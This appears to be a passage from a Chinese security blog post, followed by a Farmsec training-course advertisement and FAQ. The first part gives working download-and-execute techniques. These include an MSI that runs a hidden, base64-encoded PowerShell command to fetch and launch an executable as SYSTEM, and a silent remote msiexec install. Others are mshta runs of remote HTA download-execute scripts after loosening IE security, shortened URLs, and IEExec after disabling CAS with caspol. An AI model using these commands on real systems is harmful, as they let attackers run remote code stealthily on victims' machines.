    <Property Id="cmdline">powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==    </Property>
    <CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>
    <CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">      invalid vbs to fail install    </CustomAction>
    <InstallExecuteSequence>      <Custom Action="SystemShell" After="InstallInitialize"></Custom>      <Custom Action="FailInstall" Before="InstallFiles"></Custom>    </InstallExecuteSequence>
  </Product></Wix>

将其编译,生成msi文件,命令如下:

candle.exe msigen.wixlight.exe msigen.wixobj

生成test.msi

实现功能:

msiexec /q /i https://github.com/3gstudent/test/raw/master/test.msi

注:

执行后需要手动结束进程msiexec.exe

7、mshta

mshta支持httphtpps

但mshta在执行hta脚本时,类似于浏览器,会根据链接返回头进行对应的解析操作,所以这里只有当返回头为html时才会运行

否则会被当普通文本进行解析

对于github的代码,返回的格式为text/plain

如果使用如下命令执行:

mshta https://raw.githubusercontent.com/3gstudent/test/master/calc.hta

会把代码当成text,无法解析成html,导致脚本无法执行

但是我们可以换一个思路:

将hta文件传到github的博客下面,就能够被解析成html,实现代码执行

将hta文件上传至github博客下面,地址为https://3gstudent.github.io/test/calc.hta

执行如下命令:

mshta https://3gstudent.github.io/test/calc.hta

成功弹出计算器

注:

该思路来自于DM_

添加功能,实现下载执行,命令如下:

mshta https://3gstudent.github.io/test/downloadexec.hta

弹框提示此计算机上的安全设置禁止访问其它域的数据源,如下图

解决方法:

IE浏览器`-`Internet选项`-`安全

选择可信站点,添加博客地址:https://3gstudent.github.io/

如下图

自定义级别`,找到`通过域访问数据源`,选择`启用

如下图

再次测试,成功实现下载执行的功能

经过以上的测试,我们发现IE浏览器默认会拦截vbs脚本实现的下载功能

那么,我们可以大胆猜测,如果下载执行换成powershell实现的话,那么就不会被拦截

修改脚本,上传至github

命令如下:

mshta https://3gstudent.github.io/test/downloadexec2.hta

经过测试,该方法可用

使用短地址

有趣的是 http://dwz.cn/ 不支持该域名

换一个短地址网站 http://sina.lt/

生成短地址,最终命令为:

mshta http://t.cn/RYUQyF8

最终实现的最短字符长度为25

0x04 补充


1、IEExec

需要管理员权限

cd C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol -s offIEExec http://github.com/3gstudent/test/raw/master/putty.exe

注:

exe需要满足特定格式

详情可参考:

https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/

注:

我在Win7下复现失败

0x05 小结


本文对通过cmd实现从github下载文件的方法做了汇总,最短的实现方式为mshta http://t.cn/RYUQyF8

实现的最短字符长度为25

农夫五期线下培训班指南

农夫五期培训时间为 2019 年 10 月 7 日至 2020 年4 月 7 日

现今剩余最大可报名人数:53人

官方网站:www.farmsec.com

咨询微信:nongfuanquan

报名要求:年满20周岁,身体健康,无违法犯罪记录

上课地点:北京市顺义区仁和镇沙坨工业区清美尚艺院内农夫安全校区

报名流程:自http://www.farmsec.com/bmrk.html处下载报名表,填写完成后发送至[email protected]即可。最迟次日收到邮件回复后即为报名成功。

费用相关清单:

费用相关
特定班学费 人民币26000元 含住宿费及水电,无食堂
全价班学费 人民币20000元 入学七天签订合同后缴纳
梦想班学费 就业后三个月工资 正式工作后分为六个月缴纳
食宿费 2000元/月/人 包括住宿费及食堂三餐费用
公共水电费 100元/月/人 洗澡、洗衣等公共区域水电费
宿舍电费 宿舍成员平摊 宿舍成员平摊
特定班费用构成为:特定班学费(包含学费、住宿费、水电费,但吃饭费用需自理)。

全价班费用构成为:全价班学费+食宿费+公共水电费+宿舍电费,后三项可选择自主解决。

梦想班费用构成为:梦想班学费+食宿费+公共水电费+宿舍电费,后三项可选择自主解决。

以下为在你报名前需要了解的:

Q1:农夫安全到底是不是传销?

受限于高成本的培训,所以也就没有钱打广告亦或者租用高品质的写字楼,每次招生总会遇到一些人询问我们到底是不是传销……

我们给过这些人学校的照片、实时的微信视频、营业执照、北京户籍的身份证照片等等,网上跟那儿各种查户口。作为一家信息安全的机构,这使我们感觉到隐私被侵犯。

事实上这是一个我们没有办法自证的问题,因为我们即便是坏人,那么得到的回答也一样。

有担心我们理解,谁TM还不是个宝宝啊,哪怕父母带着孩子来,一个人进来校区看看,15分钟没消息就打110,这也是个验证的方式对不对?但是光问又有什么意义?

所以每次遇到这种个别的问题,我们都在感觉在跟傻逼聊天。

为此特地声明:

鸟来到这世间,是为了在天空中翱翔,不是为了躲枪子儿。

如果你此类疑问,请勿要求我们提供任何自证的信息,换言之你爱来不来。

Q2:特定班什么情况?

农夫五期新增加特定班,此班型只在第五期开放,后续将取消此班型。

在过去的几年中,由于一贯的”搅屎棍子”的定价策略,导致我们的利润很低,甚至于教师的薪资还没有农夫培养的学员收入高,所以我们的资金储备并不丰厚。

第四期我们开放了梦想班模式,使50名年轻人有了追寻梦想的机会,但如果出现意外,导致还款计划延迟,农夫安全将会有关门的风险。

我们能确保农夫五期会无风险的开展,但第六期有着不确定因素,为此我们开设特定班,这个班级存在的意义如下:

配合农夫安全最好的讲师组制作标准的课程录像,而当不确定因素变为现实时,这个版本录像将无偿向互联网开放。

你可以理解为:就如同我们在官网中放置的这张图片,我们希望成为最好的革新者,所以目的很单纯 “农夫安全不吃这碗饭的时候,那就谁也别吃了……”

如果想要报名特定班,需要经过单独申请及审核,主要审核的点将由以下因素构成:

1.对于我们是否有足够的信任(取消掉所有的可退款、可退学的条款)

2.能否确保半年不请假

3.普通话是否标准

4.性格是否足够开朗

5.打字速度及放弃各种肖像权、姓名权、声音权等等相关权利。

备注:培训地点不在北京校区,如无充足信任请勿选择。

Q3:全价班是什么情况?

1.在入学七天的免费试听结束后,签订培训协议后缴纳学费20000元。

2.班级限定总人数最高为25人。

3.主讲教师为农夫第二带班经验丰富的讲师shackle

4.现今已培养40余名学员走向工作岗位。

5.同时其将作为北京校区的负责人管理校区,所以无需担心能力。

Q4:梦想班是什么情况?

农夫两个教学小组都将负责梦想班的教学。农夫五期尽所能开放梦想班人数额度。

共开设两个班级,班级总人数最高为25人(硬限制为30人)。

在入学七天的免费试听结束后,签订培训协议后继续学习,依照如下条款进行学费的约定:

1. 零学费入学方案针对人群为在校临近毕业的大学生(专本皆可)及毕业不超过两年具有专本学历的群体。

解释:农夫安全并不在意学员的基础水平及所谓的名校光环。我们更在意的是你是否有充足的动力与体力去完成这半年的学习。我们过去的经验告诉我们,这个群体的大多数对自我有着期许。

2. 学习期间,食宿相关费用由学员自理。

解释:学员自己出钱解决半年的食宿,食宿费为每月2000,包含住宿费及每日三餐费用,此费用为按月支付,可最大化减少学生的经济压力。

3. 完成学习后,找到正式全职工作后开始支付学费,学费总额为全职工作的三个月薪水总和,共分为六个月还款,期间不涉及任何利息及违约金等。

解释:从你开始拿到薪水以后开始还,如果你的工资是10000,试用期的工资为8000的情况下,总金额为8000*3=24000。此费用分为六个月还,即每个月4000,剩下的钱足够你生存。如果遇到特殊情况,则特殊对待。特别声明,如果你学完,故意去干1500的工作,我们也是没有任何办法的,此机制唯一的凭证是企业给你的邮件offer,彼此用诚信做抵押。

4. 鉴于农夫以往毕业生的薪酬情况,为保障学员利益,特别限定学费最高额度为35000。无最低下限额度。

解释:农夫现今所有毕业时平均月薪为11500,但最高薪资为15000,为了鼓励学生多挣钱,封顶金额为35000:)即如果你的工资是20000,那么还35000即可。

5. 学员在拿到正式offer后,可通过一次性结清学费20000元买断权利。解释:如果你觉得总还款金额大于全价班的20000有点亏,那么在你拿到offer后一周内,可以直接支付20000元学费给农夫。则不涉及后续三个月工资的情况。

6. 如果不符合群体要求,可支付5000元进行报名(入学七天后),后期执行还款后免除这5000金额。

Q5:各个班型所讲课程有什么区别?

农夫安全五期所有的班级类型,所讲的课程全部一致,并且课程录像均采用特定班的录像。为此在教学质量上无须担心。

由于农夫四期时发现一名插班生企图盗窃PPT 教学视频的情况,为此第五期所有教学内容将会更新升级,采用更好的课程体系及教学安排。

所以你大脑中什么便宜没好货,不给钱是不是就教学差这种认知就放弃吧,我们在裁员潮中,都没有放弃学员的100%就业率,农夫安全众多优秀的品质之一便是责任心:)

相比于挣你那三瓜两枣的学费,我们更看重的是拯救世界~

Q6:在半年中到底学什么?

农夫的课程体系中,共分为四大块:

1.基础篇:

主要讲解Linux server/windows server/云计算/网络等IT基础知识。

完成学习后,学员将拥有独立创建企业基础IT架构的能力。

2.风险评估篇:

主要讲解漏洞原理以及不低于50款国内外主流安全工具。

针对现今主流的web安全 移动端安全 系统安全均有深入讲解。

完成学习后,学员将拥有独立挖掘漏洞,针对企业进行风险评估的能力。

3.安全防御篇:

主要讲解各种安全防御技术.包括但不限于web防火墙 入侵检测 大数据日志分析 系统加固 安全基线 终端安全等。

完成学习后,学员将拥有独立构建企业安全防护体系 调查取证 攻防对抗的能力。

4.安全治理篇:

主要讲解企业安全管理的相关知识。主要内容为国家等级保护 CISSP相关知识。

此课程为非技术类课程,完成学习后,学员将拥有一定企业安全治理的能力。

我们是行业内唯一一家以 Linux为教学环境的机构。

我们是行业内唯一一家以培养甲方安全专家为目标的机构。

相比于同行业的web安全工程师、逆向安全工程师、白帽子黑客等培训,农夫体系的视野更好,未来的路更宽。

农夫过往的特色不变,而新的教学体系将会增加更多有意思的细节。

Q7:就业相关的情况

在双方所签订的合同中,不包括任何就业的承诺。

在成立之初,我们参考过IT培训的行业规则,发觉并不是我们想要的。

比如我们替你写好简历,各种伪造工作经验,帮你预约几次面试,这个推荐就业是不是就完成了?

比如我们给你安排个保洁、网吧网管,或者卖到安全公司当个廉价劳动力,包就业是不是也完成了?

你得到了什么?我们又得到了什么?这种看起来的美好,有什么实质的意义嘛?

农夫内部有着完善的安排就业体系,从简历编写,到模拟面试,到试用期的技术支援。

我们选择的是更累更费心的流程,而正因为如此,我们毕业生就业率100%,吃的都是安全这碗饭,平均薪资11.5K。

而在上半年裁员潮中,我们还打破了一二线城市的薪资记录,或许你可以观察下所有从事安全培训的机构的公众号,上半年中除了农夫安全,还有哪家敢炫耀学生的就业?

Q8:毕业学生是否有证书,貌似这样对找工作有好处?

农夫安全并不提供任何的证书,哪怕随便找个打印机就可以制作的毕业证。

你们很多人因为想当黑客才入的安全这行当,而请你认真的思考下,你最初想成为一名黑客的缘由是因为帅,因为酷,在网络的世界中自由翱翔。

没错,你应该是自由的,你是你,永远是你。

证明你的优秀应该是你过去所付出的汗水换来的能力。

而不是他妈的一张破纸,擦屁股都嫌硬的那种。

 

归根结底其实一句话:来农夫安全,学本事然后出门挣钱,没那么多虚头巴脑的!

农夫安全第四季公开课正式上线啦

哈喽啊,哈哈哈,我们的第四季公开课正式发布啦~依旧免费,开放,共享你可以通过以下访问查看:

A:访问农夫安全官方论坛

http://www.farmsec.cn,网站中的农夫学堂板块里面能够查找到所有视频链接。

B:直接访问B站

https://www.bilibili.com/,搜索农夫安全即可。

第一季<李宗盛的演唱会>

http://www.farmsec.cn/?cat=17

第二季<活下去>

http://www.farmsec.cn/?cat=18

第三季<明日传奇>

http://www.farmsec.cn/?cat=105

以下为闲扯淡,看不看都行……

在几年前,我们几个小伙伴成立了农夫安全这个民间的安全团队。

很快便以能斗图瞎扯淡成为了一堆二货的聚集地。

那个时候,我们对于这个世界的改变,做了那么一点贡献,推出了国内第一套体系化的开放课程<李宗盛的演唱会>。这套精心制作的课程,事实上直到今日都不落伍。

后来,我们做了一个线下的培训班,虽然比较苦,但也是乐在其中,第一期开班后,我们为了一个尿毒症患者发起了募捐,通过课程的义卖为患者做一些事情,这便有了农夫第二季<活下去>。而那些参与录课的农夫一期学员,都已早早的在信息安全工作岗位上越走越好。

第一期做的还可以,所以第二期有了更多的学生,看着这些年轻人一步一步的成长起来,更努力的学习,我们能感受到未来是他们的,所以有了他们主力打造的第三季<明日传奇>,后来他们在社会上混的也还算挺好。

当回过头,细细的想来,居然做成了一件很牛逼的事情,这些课程居然能爆锤很多培训机构要收几万的课程。

但这也是一件很恐惧的事情,一群票友的瞎折腾,居然成了最好的……所以我们决定这一季的课程,引入更多的思维。

这一季的公开课,来自于麻省理工大学的公开课,由部分农夫四期学员翻译整理完成,共计22集,累计时长为28小时33分钟。

这套课程很好,是这些年来,我唯一能坐得住 不快进查看的课程。

我清晰的感受到这种在信安人才培养上的差距,好吧,作为中国信安培训的革新者,我们也借此知道要努力的方向。我很喜欢挂在我们新版官网的这张图,很贱有没有:)

时值中美贸易战,我们借此在视频中加了点料,在开头的字幕中,我们加入了一些国货的广告:)所以有了农夫安全第四季公开课<国货当自强>。